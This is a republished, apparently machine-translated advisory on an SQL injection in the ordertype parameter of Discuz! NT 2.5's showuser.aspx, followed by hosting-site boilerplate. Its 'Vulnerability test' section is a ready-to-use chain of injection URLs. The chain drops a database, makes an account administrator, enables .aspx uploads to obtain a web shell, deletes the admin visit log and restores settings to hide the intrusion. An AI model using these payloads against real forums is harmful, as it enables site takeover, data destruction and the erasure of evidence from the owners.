discuz! NT 2.5 Latest Major vulnerabilities

Source: Internet
Author: User
Tags net sql injection

Using discuz! NT 2.5 or just upgraded to discuz! NT 2.5 Forum version of users need to pay attention to the content of this article, timely to the official website to find solutions.

Vulnerability Description: discuz! NT 2.5 is a powerful community software based on ASP.net platform of Kangsheng (Beijing) Technology Co., Ltd. Based on the advanced. Net Framework, the default support SQL Server database, extensible support access, MySQL and other databases, support IIS5, IIS6, IIS7, safe and efficient, stable and easy to use, give full play to the asp.net characteristics, Support free choice to switch skin and support data conversion in a variety of other forums.

discuz! NT 2.5 strengthens the forum function, enhances the speed and the stability, the load ability also has the remarkable improvement, on this foundation also will provide the powerful function package including the commodity transaction, the space, the photo album and so on, for the user free choice installs, manifests the formidable expansion extensibility. Whether from the function, performance, or from the support of the environment, are currently the most sophisticated and mature asp.net community software. However, the Isto member found a security vulnerability in which a successful exploit could be used to directly modify the administrator's password into the background to gain administrator privileges to control the entire site.

Vulnerability Manufacturer: http://www.comsenz.com

Vulnerability Resolution: in discuz! NT 2.5 (Pre-20080826 Update) version of the Showuser.aspx page because of the OrderType variable is not handled well! Causes SQL injection, malicious attacks users do not even register accounts, as long as the carefully constructed ordertype can exploit this vulnerability.

Vulnerability test:

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop Database kj;–

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid= ' 1′,groupid= ' 1′where username= ' Webtets '; –//update to Admin

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' aspx ' where extension= ' jpg ' ; –//update to ASPX can be uploaded

After getting the shell ...

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' jpg ' where extension= ' aspx ' ; –//update back to JPG

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from Dnt_adminvisitlog where username= ' webtets '; –//Delete log

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users Set adminid= ", groupid=" where username= ' webtets ' ; –//Cancel Admin



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.